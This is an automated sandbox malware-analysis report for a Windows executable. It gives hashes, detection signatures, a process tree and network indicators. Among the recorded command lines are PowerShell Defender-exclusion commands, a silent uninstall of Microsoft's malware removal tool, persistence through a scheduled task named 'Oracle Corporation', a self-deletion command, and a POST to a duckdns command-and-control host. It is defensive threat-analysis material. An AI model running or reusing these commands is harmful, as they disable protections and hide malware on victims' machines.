Edit tour

Windows Analysis Report
sE5IdDeTp2.exe

Overview

General Information

Sample name:	sE5IdDeTp2.exe renamed because original name is a hash value
Original sample name:	dd36f6f79e68d5e54c75527db2da97ad.exe
Analysis ID:	1589501
MD5:	dd36f6f79e68d5e54c75527db2da97ad
SHA1:	a373e613510ada66cea74ffc590c25edc59957ac
SHA256:	3030ba393865e41fee490205bf5873b4041275a8830d5e764693771fec2bd35e
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Exploit detected, runtime environment starts unknown processes

Loading BitLocker PowerShell Module

Modifies the context of a thread in another process (thread injection)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Self deletion via cmd or bat file

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Too many similar processes found

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

sE5IdDeTp2.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\sE5IdDeTp2.exe" MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7528 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7808 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7876 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 7816 cmdline: C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7904 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7952 cmdline: C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7960 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 8048 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

dialer_java.exe (PID: 7984 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 8072 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5232 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7196 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 7436 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7616 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7688 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7852 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3228 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5332 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 8112 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1712 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4112 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6012 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7836 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5628 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3492 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6920 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6744 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6768 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4348 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4324 cmdline: C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1888 cmdline: C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 7848 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7864 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 8040 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 1440 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 6552 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7220 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4228 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 6524 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 4624 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 3872 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 5436 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3336 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7860 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 7576 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 4248 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 6008 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 6816 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 6752 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dialer_java.exe (PID: 7980 cmdline: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe MD5: DD36F6F79E68D5E54C75527DB2DA97AD)

powershell.exe (PID: 7932 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wusa.exe (PID: 7404 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)

schtasks.exe (PID: 3752 cmdline: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 7516, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7528, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", CommandLine: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 7516, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml", ProcessId: 7904, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\sE5IdDeTp2.exe", ParentImage: C:\Users\user\Desktop\sE5IdDeTp2.exe, ParentProcessId: 7516, ParentProcessName: sE5IdDeTp2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7528, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-12T17:49:37.345161+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	173.244.207.29	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: sE5IdDeTp2.exe	Virustotal: Detection: 40%			Perma Link
Source: sE5IdDeTp2.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140033FF0 BCryptCloseAlgorithmProvider,free,free,	27_2_0000000140033FF0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140035010 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,	27_2_0000000140035010
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140034050 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,	27_2_0000000140034050
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140035080 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,BCryptOpenAlgorithmProvider,BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,BCryptGetProperty,malloc,BCryptCreateHash,	27_2_0000000140035080
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400340C0 BCryptEncrypt,BCryptEncrypt,	27_2_00000001400340C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140034200 BCryptEncrypt,	27_2_0000000140034200
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140035220 BCryptHashData,	27_2_0000000140035220
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140035270 BCryptGetProperty,BCryptFinishHash,	27_2_0000000140035270
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400342C0 BCryptDecrypt,BCryptDecrypt,	27_2_00000001400342C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140035340 BCryptDestroyHash,BCryptDuplicateHash,	27_2_0000000140035340
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400353D0 BCryptDestroyHash,BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,	27_2_00000001400353D0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140034400 BCryptDecrypt,	27_2_0000000140034400
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400344C0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,	27_2_00000001400344C0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140034A20 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,calloc,memcpy,BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,malloc,malloc,BCryptImportKey,free,malloc,malloc,BCryptGetProperty,BCryptGetProperty,malloc,	27_2_0000000140034A20
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140033C60 BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,	27_2_0000000140033C60
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140033CE0 BCryptDestroyHash,BCryptCloseAlgorithmProvider,free,	27_2_0000000140033CE0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140033D40 BCryptOpenAlgorithmProvider,BCryptGetProperty,malloc,	27_2_0000000140033D40
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140034FA0 BCryptDestroyKey,BCryptCloseAlgorithmProvider,free,free,free,free,	27_2_0000000140034FA0

Source: unknown

HTTPS traffic detected: 173.244.207.29:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: sE5IdDeTp2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Windows\System32\conhost.exe	Code function: 27_2_00000001400389D0 MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,FindClose,		27_2_00000001400389D0
Source: C:\Windows\System32\conhost.exe	Code function: 27_2_0000000140038E50 strncpy,MultiByteToWideChar,MultiByteToWideChar,calloc,MultiByteToWideChar,FindFirstFileW,free,malloc,FindClose,		27_2_0000000140038E50

Software Vulnerabilities

Exploit detected, runtime environment starts unknown processes

Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: blockchainlegion.duckdns.org

Source: global traffic

HTTP traffic detected: POST /api/point.php HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonContent-Length: 270Host: blockchainlegion.duckdns.org

Source: Joe Sandbox View

IP Address: 173.244.207.29 173.244.207.29

Source: Joe Sandbox View

ASN Name: FREE-MPEIRU FREE-MPEIRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 173.244.207.29:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: polygon-rpc.com
Source: global traffic	DNS traffic detected: DNS query: blockchainlegion.duckdns.org

Source: unknown

